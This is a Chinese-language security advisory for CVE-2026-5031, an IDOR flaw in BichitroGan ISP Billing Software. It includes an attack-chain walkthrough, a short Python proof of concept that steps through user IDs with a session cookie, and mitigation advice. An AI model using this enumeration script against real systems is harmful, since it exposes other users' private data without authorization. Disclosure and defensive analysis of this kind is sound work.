CVE-2026-5031: BichitroGan ISP资源标识符控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-5031

漏洞类型

资源标识符控制不当 (IDOR)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BichitroGan ISP Billing Software

漏洞概述

BichitroGan ISP Billing Software 2025.3.20版本中发现了一个安全漏洞。该漏洞位于组件的Endpoint端点，具体文件路径为`/?_route=settings/users-view/`。由于系统未能对资源标识符实施有效的控制机制，攻击者可以通过恶意篡改请求参数中的`ID`参数来绕过权限检查。这允许未经授权的远程攻击者访问本应受保护的敏感数据。尽管该漏洞的CVSS评分为4.3（中危），但其利用难度低且无需用户交互，且目前已有公开的利用代码发布，对使用该软件的企业构成了实际的安全威胁。

技术细节

该漏洞属于典型的不安全的直接对象引用（IDOR）。在BichitroGan ISP Billing Software 2025.3.20版本中，`/?_route=settings/users-view/`端点直接接收用户提交的`ID`参数来查询数据库并返回用户信息。问题在于，服务器端仅校验了发起请求的用户是否经过身份认证（PR:L），却未进一步校验该用户是否拥有访问特定`ID`所对应数据的权限。这导致任何拥有低权限账户的攻击者，只需通过修改HTTP请求中的`ID`值（例如从1递增），即可遍历系统内所有用户的敏感信息。由于攻击复杂度低（AC:L）且无需用户交互（UI:N），攻击者可轻易自动化此过程。虽然漏洞主要影响机密性（C:L），但在缺乏日志审计的情况下，可能导致大规模的数据泄露。

攻击链分析

STEP 1

侦察与认证

攻击者识别出目标系统使用BichitroGan ISP Billing Software，并获取一个低权限用户账户的会话令牌。

STEP 2

构造恶意请求

攻击者向`/?_route=settings/users-view/`端点发送GET请求，并将参数`ID`修改为猜测的用户ID（如ID=2）。

STEP 3

权限绕过

服务器端仅验证了会话有效性，未验证当前用户对ID=2数据的访问权限，直接返回了敏感信息。

STEP 4

数据窃取

攻击者解析响应内容，获取目标用户的详细信息，并通过自动化脚本遍历所有ID以批量获取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def poc_check(target_url, session_id):
    """
    PoC for CVE-2026-5031
    Demonstrates IDOR by iterating user IDs.
    """
    headers = {
        "Cookie": f"PHPSESSID={session_id}",
        "User-Agent": "Mozilla/5.0 (PoC-Scanner)"
    }
    
    print(f"[*] Checking target: {target_url}")
    
    # Iterate through potential user IDs
    for user_id in range(1, 10):
        params = {"ID": user_id}
        try:
            response = requests.get(target_url, headers=headers, params=params, timeout=5)
            if response.status_code == 200 and "username" in response.text:
                print(f"[+] ID {user_id} is accessible!")
                # print(response.text) # Uncomment to see data
            else:
                print(f"[-] ID {user_id} not accessible or invalid")
        except Exception as e:
            print(f"[!] Error connecting: {e}")

if __name__ == "__main__":
    # Replace with actual target and session
    poc_check("http://target.com/?_route=settings/users-view/", "valid_session_cookie")

影响范围

2025.3.20

防御指南

临时缓解措施

在厂商发布修复补丁前，建议在网络层面限制对`/?_route=settings/users-view/`端点的访问频率，仅允许受信任的IP地址访问。同时，管理员应启用详细的日志审计功能，监控是否存在单一用户对大量不同ID的异常访问请求，以便及时发现潜在的攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5031
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5031
3 Details https://www.cvedetails.com/cve/CVE-2026-5031/
4 VulDB https://vuldb.com/cve/CVE-2026-5031
5 Link https://github.com/4m3rr0r/PoCVulDb/issues/15
6 Link https://vuldb.com/submit/778530
7 Link https://vuldb.com/vuln/353953
8 Link https://vuldb.com/vuln/353953/cti